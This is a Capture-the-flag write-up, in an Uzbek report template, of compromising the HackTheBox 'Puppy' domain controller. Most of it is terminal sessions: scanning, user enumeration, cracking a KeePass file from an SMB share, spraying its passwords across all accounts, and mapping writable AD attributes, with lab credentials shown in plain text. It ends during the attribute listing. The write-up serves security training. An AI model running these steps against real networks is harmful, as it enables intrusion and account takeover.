Writeup Anonymous Puppy
Writeup Anonymous Puppy
Umumiy Ma’lumotlar
IP address xx.xx.xx.xx
Topilgan Flaglar
💡 Flag ni belgilangan bo’limga nusxa ko’chirib tashlang. Bundan tashqari flag topilgan ekran screenshotini ham
ushbu bo’limga tashlang.
User Flag
Puppy 1
Root Flag
Toplgan Zaifliklar
💡 Har bitta topilgan zaiflikni shu yerda to’ldirib, u haqida batafsil malumot olish uchun link qoldirasiz. U zaiflik
nimalarga saba bo’lishi va qaysi explit orqali buzilishinni ham shu yerda tushuntirib berishingiz kerak. Birnchida
keltirilgan zaiflik bu sizga misol sifatida keltirilgan. Nechta zaiflik topa olsangiz barchasini kiriting.
Puppy 2
Hisobot
💡 Har bitta bosqichda qilgan ishlaringizni batafsil, screenshotlar, foydalanilgan explitlar bilan tushuntirib yozing.
㉿
┌──(kali kali)-[~]
└─$ nmap -A xx.xx.xx.xx --min-rate 10000
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-17 15:00 EDT
Nmap scan report for xx.xx.xx.xx
Host is up (0.097s latency).
Not shown: 985 filtered tcp ports (no-response)
Bug in iscsi-info: no string output.
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-05-18 02:00:50Z)
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/tcp6 rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 2,3,4 111/udp6 rpcbind
| 100003 2,3 2049/udp nfs
| 100003 2,3 2049/udp6 nfs
| 100005 1,2,3 2049/udp mountd
| 100005 1,2,3 2049/udp6 mountd
| 100021 1,2,3,4 2049/tcp nlockmgr
| 100021 1,2,3,4 2049/tcp6 nlockmgr
| 100021 1,2,3,4 2049/udp nlockmgr
| 100021 1,2,3,4 2049/udp6 nlockmgr
| 100024 1 2049/tcp status
| 100024 1 2049/tcp6 status
| 100024 1 2049/udp status
|_ 100024 1 2049/udp6 status
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: PUPPY.HTB0., Site: Default-First-Site-
Name)
Puppy 3
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
2049/tcp open nlockmgr 1-4 (RPC #100021)
3260/tcp open iscsi?
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: PUPPY.HTB0., Site: Default-First-Site
-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2022|2012|2016 (89%)
OS CPE: cpe:/o:microsoft:windows_server_2022 cpe:/o:microsoft:windows_server_2012:r2 cpe:/o:microsoft:window
s_server_2016
Aggressive OS guesses: Microsoft Windows Server 2022 (89%), Microsoft Windows Server 2012 R2 (85%), Microso
ft Windows Server 2016 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 176.71 seconds
┌──(kali ㉿kali)-[~]
└─$ sudo crackmapexec smb xx.xx.xx.xx -u levi.james -p 'KingofAkron2025!' --users
SMB xx.xx.xx.xx 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:PUPPY.H
TB) (signing:True) (SMBv1:False)
SMB xx.xx.xx.xx 445 DC [+] PUPPY.HTB\levi.james:KingofAkron2025!
SMB xx.xx.xx.xx 445 DC [+] Enumerated domain user(s)
SMB xx.xx.xx.xx 445 DC PUPPY.HTB\steph.cooper_adm badpwdcount: 5 desc:
SMB xx.xx.xx.xx 445 DC PUPPY.HTB\steph.cooper badpwdcount: 5 desc:
SMB xx.xx.xx.xx 445 DC PUPPY.HTB\jamie.williams badpwdcount: 5 desc:
SMB xx.xx.xx.xx 445 DC PUPPY.HTB\adam.silver badpwdcount: 0 desc:
SMB xx.xx.xx.xx 445 DC PUPPY.HTB\ant.edwards badpwdcount: 0 desc:
SMB xx.xx.xx.xx 445 DC PUPPY.HTB\levi.james badpwdcount: 0 desc:
Puppy 4
SMB xx.xx.xx.xx 445 DC PUPPY.HTB\krbtgt badpwdcount: 0 desc: Key Distribution
Center Service Account
SMB xx.xx.xx.xx 445 DC PUPPY.HTB\Guest badpwdcount: 0 desc: Built-in account
for guest access to the computer/domain
SMB xx.xx.xx.xx 445 DC PUPPY.HTB\Administrator badpwdcount: 0 desc: Built-in accou
nt for administering the computer/domain
㉿
┌──(kali kali)-[~]
└─$ echo "xx.xx.xx.xx DC.PUPPY.HTB PUPPY.HTB" | sudo tee -a /etc/hosts
10.10.11.70 DC.PUPPY.HTB PUPPY.HTB
㉿
┌──(kali kali)-[~/Desktop/HTB/Puppy]
└─$ nxc smb PUPPY.HTB -u 'levi.james' -p 'KingofAkron2025!' --rid-brute | grep "SidTypeUser" | awk -F '\\' '{print
$2}' | awk '{print $1}' > users.txt
┌──(kali ㉿kali)-[~/Desktop/HTB/Puppy]
└─$ cat users.txt
Administrator
Guest
krbtgt
DC$
levi.james
ant.edwards
adam.silver
jamie.williams
steph.cooper
steph.cooper_adm
┌──(kali ㉿kali)-[~/Desktop/HTB/Puppy]
└─$ sudo nano /etc/resolv.conf
┌──(kali ㉿kali)-[~/Desktop/HTB/Puppy]
└─$ cat /etc/resolv.conf
nameserver xx.xx.xx.xx
nameserver 8.8.8.8
nameserver 1.1.1.1
nameserver 192.168.0.1
㉿
┌──(kali kali)-[~/Desktop/HTB/Puppy]
└─$ bloodhound-python -dc DC.PUPPY.HTB -u 'levi.james' -p 'KingofAkron2025!' -d PUPPY.HTB -c All -o bloodho
und_results.json -ns xx.xx.xx.xx
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: puppy.htb
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: Kerberos SessionError: KRB_AP_
ERR_SKEW(Clock skew too great)
INFO: Connecting to LDAP server: DC.PUPPY.HTB
Puppy 5
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: DC.PUPPY.HTB
INFO: Found 10 users
INFO: Found 56 groups
INFO: Found 3 gpos
INFO: Found 3 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC.PUPPY.HTB
INFO: Done in 00M 19S
Bizning userda Developers guruhiga GenericWrite huquqi bor lekin bu bilan davom eta olmaymiz shuning uchun
chuquroq qidiramiz
Exploitation (Buzib kirish)
crackmapexec bilan mavjud bo‘lgan file shares (ulashilgan papkalar) ro‘yxatini ko’ramiz
㉿
┌──(kali kali)-[~/Desktop/HTB/Puppy]
└─$ sudo crackmapexec smb xx.xx.xx.xx -u levi.james -p 'KingofAkron2025!' --shares
SMB xx.xx.xx.xx 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:PUPPY.HT
B) (signing:True) (SMBv1:False)
SMB xx.xx.xx.xx 445 DC [+] PUPPY.HTB\levi.james:KingofAkron2025!
SMB xx.xx.xx.xx 445 DC [+] Enumerated shares
SMB xx.xx.xx.xx 445 DC Share Permissions Remark
SMB xx.xx.xx.xx 445 DC ----- ----------- ------
SMB xx.xx.xx.xx 445 DC ADMIN$ Remote Admin
SMB xx.xx.xx.xx 445 DC C$ Default share
SMB xx.xx.xx.xx 445 DC DEV DEV-SHARE for PUPPY-DEVS
SMB xx.xx.xx.xx 445 DC IPC$ READ Remote IPC
SMB xx.xx.xx.xx 445 DC NETLOGON READ Logon server share
SMB xx.xx.xx.xx 445 DC SYSVOL READ Logon server share
Puppy 6
┌──(kali ㉿kali)-[~/Desktop/HTB/Puppy]
└─$ smbclient \\\\xx.xx.xx.xx\\DEV -U "levi.james"
Password for [WORKGROUP\levi.james]:
Try "help" to get a list of possible commands.
smb: \> dir
. DR 0 Sun Mar 23 03:07:57 2025
.. D 0 Sat Mar 8 11:52:57 2025
KeePassXC-2.7.9-Win64.msi A 34394112 Sun Mar 23 03:09:12 2025
Projects D 0 Sat Mar 8 11:53:36 2025
recovery.kdbx A 2677 Tue Mar 11 22:25:46 2025
㉿
┌──(kali kali)-[~/Desktop/HTB/Puppy]
└─$ sudo apt install keepassxc
㉿
┌──(kali kali)-[~/Desktop/HTB/Puppy]
└─$ wget https://raw.githubusercontent.com/r3nt0n/keepass4brute/master/keepass4brute.sh
┌──(kali ㉿kali)-[~/Desktop/HTB/Puppy]
└─$ chmod +x keepass4brute.sh
┌──(kali ㉿kali)-[~/Desktop/HTB/Puppy]
└─$ ./keepass4brute.sh recovery.kdbx /usr/share/wordlists/rockyou.txt
[+] Words tested: 38/14344394 - Attempts per minute: 63 - Estimated time remaining: 22 weeks, 4 days
[+] Current attempt: liver...
㉿
┌──(kali kali)-[~/Desktop/HTB/Puppy]
└─$ keepassxc-cli export --format=xml recovery.kdbx > keepass_dump.xml
Enter password to unlock recovery.kdbx: liver...
┌──(kali ㉿kali)-[~/Desktop/HTB/Puppy]
└─$ ll
total 32
-rw-rw-r-- 1 kali kali 0 May 17 15:30 hash.txt
-rwxrwxr-x 1 kali kali 2820 May 17 15:34 keepass4brute.sh
-rw-rw-r-- 1 kali kali 12960 May 17 15:47 keepass_dump.xml
drwxrwxr-x 3 kali kali 4096 May 17 15:38 mod0keecrack
Puppy 7
-rw-r--r-- 1 kali kali 2677 May 17 15:23 recovery.kdbx
-rw-rw-r-- 1 kali kali 111 May 17 15:09 users.txt
㉿
┌──(kali kali)-[~/Desktop/HTB/Puppy]
└─$ head keepass_dump.xml
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<KeePassFile>
<Meta>
<Generator>KeePassXC</Generator>
<DatabaseName>recovery</DatabaseName>
<DatabaseNameChanged>HqBg3w4AAAA=</DatabaseNameChanged>
<DatabaseDescription>recover AD members, incase of lost credentials</DatabaseDescription>
<DatabaseDescriptionChanged>HqBg3w4AAAA=</DatabaseDescriptionChanged>
<DefaultUserName/>
<DefaultUserNameChanged>+Z9g3w4AAAA=</DefaultUserNameChanged>
㉿
┌──(kali kali)-[~/Desktop/HTB/Puppy]
└─$ cat extract_keepass.py
import xml.etree.ElementTree as ET
tree = ET.parse('keepass_dump.xml')
root = tree.getroot()
㉿
┌──(kali kali)-[~/Desktop/HTB/Puppy]
└─$ python3 extract_keepass.py | awk -F'Password: ' '{print $2}' > passwords_only.txt
┌──(kali ㉿kali)-[~/Desktop/HTB/Puppy]
└─$ ll
total 40
-rw-rw-r-- 1 kali kali 498 May 17 15:54 extract_keepass.py
-rw-rw-r-- 1 kali kali 0 May 17 15:30 hash.txt
-rwxrwxr-x 1 kali kali 2820 May 17 15:34 keepass4brute.sh
-rw-rw-r-- 1 kali kali 12960 May 17 15:47 keepass_dump.xml
drwxrwxr-x 3 kali kali 4096 May 17 15:38 mod0keecrack
Puppy 8
-rw-rw-r-- 1 kali kali 99 May 17 15:55 passwords_only.txt
-rw-rw-r-- 1 kali kali 0 May 17 15:53 passwords.txt
-rw-r--r-- 1 kali kali 2677 May 17 15:23 recovery.kdbx
-rw-rw-r-- 1 kali kali 111 May 17 15:09 users.txt
㉿
┌──(kali kali)-[~/Desktop/HTB/Puppy]
└─$ cat passwords_only.txt
JamieLove2025!
HJKL2025!
HJKL2025!
Antman2025!
Antman2025!
Steve2025!
Steve2025!
ILY2025!
ILY2025!
㉿
┌──(kali kali)-[~/Desktop/HTB/Puppy]
└─$ crackmapexec smb 10.10.11.70 -u users.txt -p passwords_only.txt --continue-on-success
SMB 10.10.11.70 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:PUPPY.HT
B) (signing:True) (SMBv1:False)
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\Administrator:JamieLove2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\Administrator:HJKL2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\Administrator:HJKL2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\Administrator:Antman2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\Administrator:Antman2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\Administrator:Steve2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\Administrator:Steve2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\Administrator:ILY2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\Administrator:ILY2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\Guest:JamieLove2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\Guest:HJKL2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\Guest:HJKL2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\Guest:Antman2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\Guest:Antman2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\Guest:Steve2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\Guest:Steve2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\Guest:ILY2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\Guest:ILY2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\krbtgt:JamieLove2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\krbtgt:HJKL2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\krbtgt:HJKL2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\krbtgt:Antman2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\krbtgt:Antman2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\krbtgt:Steve2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\krbtgt:Steve2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\krbtgt:ILY2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\krbtgt:ILY2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\DC$:JamieLove2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\DC$:HJKL2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\DC$:HJKL2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\DC$:Antman2025! STATUS_LOGON_FAILURE
Puppy 9
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\DC$:Antman2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\DC$:Steve2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\DC$:Steve2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\DC$:ILY2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\DC$:ILY2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\levi.james:JamieLove2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\levi.james:HJKL2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\levi.james:HJKL2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\levi.james:Antman2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\levi.james:Antman2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\levi.james:Steve2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\levi.james:Steve2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\levi.james:ILY2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\levi.james:ILY2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\ant.edwards:JamieLove2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\ant.edwards:HJKL2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\ant.edwards:HJKL2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [+] PUPPY.HTB\ant.edwards:Antman2025!
SMB 10.10.11.70 445 DC [+] PUPPY.HTB\ant.edwards:Antman2025!
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\ant.edwards:Steve2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] Connection Error: The NETBIOS connection with the remote host timed
out.
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\ant.edwards:ILY2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\ant.edwards:ILY2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\adam.silver:JamieLove2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\adam.silver:HJKL2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\adam.silver:HJKL2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\adam.silver:Antman2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\adam.silver:Antman2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\adam.silver:Steve2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\adam.silver:Steve2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\adam.silver:ILY2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\adam.silver:ILY2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\jamie.williams:JamieLove2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\jamie.williams:HJKL2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\jamie.williams:HJKL2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\jamie.williams:Antman2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\jamie.williams:Antman2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\jamie.williams:Steve2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\jamie.williams:Steve2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\jamie.williams:ILY2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\jamie.williams:ILY2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\steph.cooper:JamieLove2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\steph.cooper:HJKL2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\steph.cooper:HJKL2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\steph.cooper:Antman2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\steph.cooper:Antman2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\steph.cooper:Steve2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\steph.cooper:Steve2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\steph.cooper:ILY2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\steph.cooper:ILY2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\steph.cooper_adm:JamieLove2025! STATUS_LOGON_FAIL
URE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\steph.cooper_adm:HJKL2025! STATUS_LOGON_FAILURE
Puppy 10
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\steph.cooper_adm:HJKL2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\steph.cooper_adm:Antman2025! STATUS_LOGON_FAILUR
E
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\steph.cooper_adm:Antman2025! STATUS_LOGON_FAILUR
E
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\steph.cooper_adm:Steve2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\steph.cooper_adm:Steve2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\steph.cooper_adm:ILY2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\steph.cooper_adm:ILY2025! STATUS_LOGON_FAILURE
[+] PUPPY.HTB\ant.edwards:Antman2025!
Antman2025!
㉿
┌──(kali kali)-[~/Desktop/HTB/Puppy/edward]
└─$ bloodhound-python -dc DC.PUPPY.HTB -u 'ant.edwards' -p 'Antman2025!' -d PUPPY.HTB -c All -o bloodhoun
d_results.json -ns xx.xx.xx.xx
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: puppy.htb
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: Kerberos SessionError: KRB_AP_
ERR_SKEW(Clock skew too great)
INFO: Connecting to LDAP server: DC.PUPPY.HTB
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: DC.PUPPY.HTB
INFO: Found 10 users
INFO: Found 56 groups
INFO: Found 3 gpos
INFO: Found 3 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC.PUPPY.HTB
INFO: Done in 00M 20S
Puppy 11
㉿
┌──(kali kali)-[~/Desktop/HTB/Puppy]
└─$ bloodyAD --host xx.xx.xx.xx -d PUPPY.HTB -u Ant.Edwards -p 'Antman2025!' get writable --detail
distinguishedName: CN=S-1-5-11,CN=ForeignSecurityPrincipals,DC=PUPPY,DC=HTB
url: WRITE
wWWHomePage: WRITE
Puppy 12
msDS-AllowedToActOnBehalfOfOtherIdentity: WRITE
msPKI-CredentialRoamingTokens: WRITE
msDS-FailedInteractiveLogonCountAtLastSuccessfulLogon: WRITE
msDS-FailedInteractiveLogonCount: WRITE
msDS-LastFailedInteractiveLogonTime: WRITE
msDS-LastSuccessfulInteractiveLogonTime: WRITE
msDS-SupportedEncryptionTypes: WRITE
msPKIAccountCredentials: WRITE
msPKIDPAPIMasterKeys: WRITE
msPKIRoamingTimeStamp: WRITE
mSMQDigests: WRITE
mSMQSignCertificates: WRITE
userSharedFolderOther: WRITE
userSharedFolder: WRITE
url: WRITE
otherIpPhone: WRITE
ipPhone: WRITE
assistant: WRITE
primaryInternationalISDNNumber: WRITE
primaryTelexNumber: WRITE
otherMobile: WRITE
otherFacsimileTelephoneNumber: WRITE
userCert: WRITE
homePostalAddress: WRITE
personalTitle: WRITE
wWWHomePage: WRITE
otherHomePhone: WRITE
streetAddress: WRITE
otherPager: WRITE
info: WRITE
otherTelephone: WRITE
userCertificate: WRITE
preferredDeliveryMethod: WRITE
registeredAddress: WRITE
internationalISDNNumber: WRITE
x121Address: WRITE
facsimileTelephoneNumber: WRITE
teletexTerminalIdentifier: WRITE
telexNumber: WRITE
telephoneNumber: WRITE
physicalDeliveryOfficeName: WRITE
postOfficeBox: WRITE
postalCode: WRITE
postalAddress: WRITE
street: WRITE
st: WRITE
l: WRITE
c: WRITE
Puppy 13
shadowFlag: WRITE
shadowExpire: WRITE
shadowInactive: WRITE
shadowWarning: WRITE
shadowMax: WRITE
shadowMin: WRITE
shadowLastChange: WRITE
loginShell: WRITE
unixHomeDirectory: WRITE
gecos: WRITE
gidNumber: WRITE
uidNumber: WRITE
msSFU30NisDomain: WRITE
msSFU30Name: WRITE
labeledURI: WRITE
userPKCS12: WRITE
preferredLanguage: WRITE
thumbnailLogo: WRITE
thumbnailPhoto: WRITE
middleName: WRITE
departmentNumber: WRITE
carLicense: WRITE
jpegPhoto: WRITE
audio: WRITE
pager: WRITE
mobile: WRITE
secretary: WRITE
homePhone: WRITE
manager: WRITE
photo: WRITE
roomNumber: WRITE
mail: WRITE
textEncodedORAddress: WRITE
uid: WRITE
userSMIMECertificate: WRITE
msDS-preferredDataLocation: WRITE
msDS-ObjectSoa: WRITE
msDS-SourceAnchor: WRITE
msDS-KeyCredentialLink: WRITE
msDS-ExternalDirectoryObjectId: WRITE
msDS-AssignedAuthNPolicy: WRITE
msDS-AssignedAuthNPolicySilo: WRITE
msDS-SyncServerUrl: WRITE
msDS-CloudAnchor: WRITE
msDS-cloudExtensionAttribute20: WRITE
msDS-cloudExtensionAttribute19: WRITE
msDS-cloudExtensionAttribute18: WRITE
msDS-cloudExtensionAttribute17: WRITE
msDS-cloudExtensionAttribute16: WRITE
msDS-cloudExtensionAttribute15: WRITE
msDS-cloudExtensionAttribute14: WRITE
msDS-cloudExtensionAttribute13: WRITE
msDS-cloudExtensionAttribute12: WRITE
msDS-cloudExtensionAttribute11: WRITE
Puppy 14
msDS-cloudExtensionAttribute10: WRITE
msDS-cloudExtensionAttribute9: WRITE
msDS-cloudExtensionAttribute8: WRITE
msDS-cloudExtensionAttribute7: WRITE
msDS-cloudExtensionAttribute6: WRITE
msDS-cloudExtensionAttribute5: WRITE
msDS-cloudExtensionAttribute4: WRITE
msDS-cloudExtensionAttribute3: WRITE
msDS-cloudExtensionAttribute2: WRITE
msDS-cloudExtensionAttribute1: WRITE
msDS-GeoCoordinatesLongitude: WRITE
msDS-GeoCoordinatesLatitude: WRITE
msDS-GeoCoordinatesAltitude: WRITE
msDS-AllowedToActOnBehalfOfOtherIdentity: WRITE
msDS-PrimaryComputer: WRITE
msTSSecondaryDesktops: WRITE
msTSPrimaryDesktop: WRITE
msDS-LastKnownRDN: WRITE
isRecycled: WRITE
msPKI-CredentialRoamingTokens: WRITE
msDS-NcType: WRITE
msTSLSProperty02: WRITE
msTSLSProperty01: WRITE
msTSManagingLS4: WRITE
msTSLicenseVersion4: WRITE
msTSExpireDate4: WRITE
msTSManagingLS3: WRITE
msTSLicenseVersion3: WRITE
msTSExpireDate3: WRITE
msTSManagingLS2: WRITE
msTSLicenseVersion2: WRITE
msTSExpireDate2: WRITE
msDS-HABSeniorityIndex: WRITE
msTSManagingLS: WRITE
msTSLicenseVersion: WRITE
msTSExpireDate: WRITE
msTSProperty02: WRITE
msTSProperty01: WRITE
msTSInitialProgram: WRITE
msTSWorkDirectory: WRITE
msTSDefaultToMainPrinter: WRITE
msTSConnectPrinterDrives: WRITE
msTSConnectClientDrives: WRITE
msTSBrokenConnectionAction: WRITE
msTSReconnectionAction: WRITE
msTSMaxIdleTime: WRITE
msTSMaxConnectionTime: WRITE
msTSMaxDisconnectionTime: WRITE
msTSRemoteControl: WRITE
msTSAllowLogon: WRITE
msTSHomeDrive: WRITE
msTSHomeDirectory: WRITE
msTSProfilePath: WRITE
msDS-FailedInteractiveLogonCountAtLastSuccessfulLogon: WRITE
Puppy 15
msDS-FailedInteractiveLogonCount: WRITE
msDS-LastFailedInteractiveLogonTime: WRITE
msDS-LastSuccessfulInteractiveLogonTime: WRITE
msDS-SupportedEncryptionTypes: WRITE
msDS-AuthenticatedAtDC: WRITE
msDS-PhoneticDisplayName: WRITE
msDS-PhoneticCompanyName: WRITE
msDS-PhoneticDepartment: WRITE
msDS-PhoneticLastName: WRITE
msDS-PhoneticFirstName: WRITE
msDS-SecondaryKrbTgtNumber: WRITE
msRADIUS-SavedFramedIpv6Route: WRITE
msRADIUS-FramedIpv6Route: WRITE
msRADIUS-SavedFramedIpv6Prefix: WRITE
msRADIUS-FramedIpv6Prefix: WRITE
msRADIUS-SavedFramedInterfaceId: WRITE
msRADIUS-FramedInterfaceId: WRITE
unixUserPassword: WRITE
msPKIAccountCredentials: WRITE
msPKIDPAPIMasterKeys: WRITE
